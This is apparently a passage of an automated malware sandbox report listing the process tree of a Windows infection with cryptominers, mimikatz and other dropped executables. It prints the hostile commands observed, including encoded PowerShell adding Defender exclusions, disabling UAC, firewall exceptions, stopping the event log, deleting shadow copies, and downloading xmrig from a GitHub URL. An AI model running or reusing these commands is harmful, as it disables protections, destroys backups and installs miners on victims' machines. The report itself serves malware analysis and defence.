      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6104
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3096
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,12311177120123414946,1723508216844042385,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:180
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\y58gd" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6312
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7040
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 800
      4⤵
      Program crash
      PID:3096
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5028
- - C:\Users\Admin\AppData\Local\Temp\a\update.exe
    "C:\Users\Admin\AppData\Local\Temp\a\update.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5412
  - - C:\Users\Admin\AppData\Local\Temp\WindowsLib.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsLib.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6664
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVwBpAG4AZABvAHcAcwBMAGkAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABXAGkAbgBkAG8AdwBzAEwAaQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABMAGUAbgBnAHQAaAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABMAGUAbgBnAHQAaAAuAGUAeABlAA==
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6628
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4732
    - - C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe"
        5⤵
        
        PID:4600
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        Modifies registry key
        
        PID:3692
      - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        6⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        Modifies registry key
        
        PID:6288
        
        C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        7⤵
        
        PID:2208
- - C:\Users\Admin\AppData\Local\Temp\a\AA.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AA.exe"
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\tmp1CD0.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp1CD0.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAAMQBDAEQAMAAuAHQAbQBwAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADEAQwBEADAALgB0AG0AcAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABNAGUAcwBzAGEAZwBlAC4AZQB4AGUA
        5⤵
        
        PID:6832
- - C:\Users\Admin\AppData\Local\Temp\a\iox.exe
    "C:\Users\Admin\AppData\Local\Temp\a\iox.exe"
    3⤵
    - Executes dropped EXE
    PID:5816
- - C:\Users\Admin\AppData\Local\Temp\a\tcp_windows_amd64.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tcp_windows_amd64.exe"
    3⤵
    - Executes dropped EXE
    PID:6040
- - C:\Users\Admin\AppData\Local\Temp\a\js.exe
    "C:\Users\Admin\AppData\Local\Temp\a\js.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o4szzsos\o4szzsos.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5112
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES706.tmp" "c:\Users\Admin\AppData\Local\Temp\o4szzsos\CSCF5E84E3A9CC64B519E30145B4C483B6F.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6420
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5004
- - C:\Users\Admin\AppData\Local\Temp\a\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2532
- - C:\Users\Admin\AppData\Local\Temp\a\Wpmutnro.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Wpmutnro.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5132
- - C:\Users\Admin\AppData\Local\Temp\a\clientside.exe
    "C:\Users\Admin\AppData\Local\Temp\a\clientside.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:6488
  - - C:\Windows\svchost.exe
      "C:\Windows\svchost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:6108
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6872
- - C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:7116
  - - C:\Windows\WindowsServices.exe
      "C:\Windows\WindowsServices.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:6804
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5288
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5796
- - C:\Users\Admin\AppData\Local\Temp\a\xmin.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmin.exe"
    3⤵
    - Executes dropped EXE
    PID:7124
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WinUpla"
      4⤵
      Launches sc.exe
      PID:4752
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WinUpla" binpath= "C:\ProgramData\WinUpla\winuspdt.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5716
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:6404
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WinUpla"
      4⤵
      Launches sc.exe
      PID:6884
- - C:\Users\Admin\AppData\Local\Temp\a\xmrminer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmrminer.exe"
    3⤵
    PID:3104
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WinUpdt"
      4⤵
      Launches sc.exe
      PID:2776
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3636
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WinUpdt"
      4⤵
      Launches sc.exe
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\a\mindelnew.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mindelnew.exe"
    3⤵
    PID:6532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      Indicator Removal: Clear Persistence
      PID:2656
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft Windows Security" /F
        5⤵
        
        PID:6248
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
      4⤵
      PID:5624
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM dwm.exe
        5⤵
        Kills process with taskkill
        
        PID:1264
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:6556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:1808
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:1180
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:2776
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:5640
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:5216
- - C:\Users\Admin\AppData\Local\Temp\a\del2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\del2.exe"
    3⤵
    PID:3312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
      4⤵
      PID:5284
    - - C:\Windows\system32\sc.exe
        
        sc delete "WinSvcs"
        5⤵
        Launches sc.exe
        
        PID:1640
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
        5⤵
        
        PID:5932
- - C:\Users\Admin\AppData\Local\Temp\a\del3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\del3.exe"
    3⤵
    PID:6104
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" ""
      4⤵
      PID:7100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
        5⤵
        
        PID:5220
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "winsrvcs"
        6⤵
        
        PID:2464
- - C:\Users\Admin\AppData\Local\Temp\a\minedelll.exe
    "C:\Users\Admin\AppData\Local\Temp\a\minedelll.exe"
    3⤵
    PID:4220
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
      4⤵
      PID:6300
    - - C:\Windows\system32\sc.exe
        
        sc delete "WinUpdt"
        5⤵
        Launches sc.exe
        
        PID:5300
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
        5⤵
        
        PID:7156
- - C:\Users\Admin\AppData\Local\Temp\a\del1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\del1.exe"
    3⤵
    PID:3932
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
      4⤵
      PID:6192
    - - C:\Windows\system32\sc.exe
        
        sc delete "Windows Services"
        5⤵
        Launches sc.exe
        
        PID:5476
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
        5⤵
        
        PID:5432
- - C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe"
    3⤵
    PID:7060
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1932
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
      4⤵
      PID:5952
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6348
- - C:\Users\Admin\AppData\Local\Temp\a\Mizedo.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Mizedo.exe"
    3⤵
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe"
    3⤵
    PID:6412
  - - \??\c:\Windows\system32\wbem\wmic.exe
      c:\mjvMrb\mjvM\..\..\Windows\mjvM\mjvM\..\..\system32\mjvM\mjvM\..\..\wbem\mjvM\mjvMr\..\..\wmic.exe shadowcopy delete
      4⤵
      PID:5784
  - - \??\c:\Windows\system32\wbem\wmic.exe
      c:\yPvKXM\yPvK\..\..\Windows\yPvK\yPvK\..\..\system32\yPvK\yPvK\..\..\wbem\yPvK\yPvKX\..\..\wmic.exe shadowcopy delete
      4⤵
      PID:3828
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4828
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5852
- - C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
    3⤵
    PID:6320
- - C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"
    3⤵
    PID:5380
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      PID:5624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4920
      - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4920" "1920" "1860" "1924" "0" "0" "1928" "0" "0" "0" "0" "0"
        6⤵
        
        PID:308
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
      4⤵
      PID:5604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
- - C:\Users\Admin\AppData\Local\Temp\a\toyour.exe
    "C:\Users\Admin\AppData\Local\Temp\a\toyour.exe"
    3⤵
    PID:4272
- - C:\Users\Admin\AppData\Local\Temp\a\klmnr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\klmnr.exe"
    3⤵
    PID:5716
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      Indicator Removal: Clear Persistence
      PID:7084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft Windows Security" /F
        5⤵
        
        PID:5888
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
      4⤵
      PID:6012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM dwm.exe
        5⤵
        Kills process with taskkill
        
        PID:1112
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:5536
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:6976
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:2112
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:5672
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
      4⤵
      PID:4244
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM conhost.exe
        5⤵
        Kills process with taskkill
        
        PID:3668
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6912
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:2224
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:3692
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1956
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:4828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3608

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3804

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3968

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4124

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4916

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2800

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3976

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3256

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1048

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3992

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:4608
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3980 -ip 3980
  2⤵
  PID:4680
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4844 -ip 4844
  2⤵
  PID:3636
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5296 -ip 5296
  2⤵
  PID:6208

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:5184

C:\ProgramData\WinUpla\winuspdt.exe
C:\ProgramData\WinUpla\winuspdt.exe
1⤵
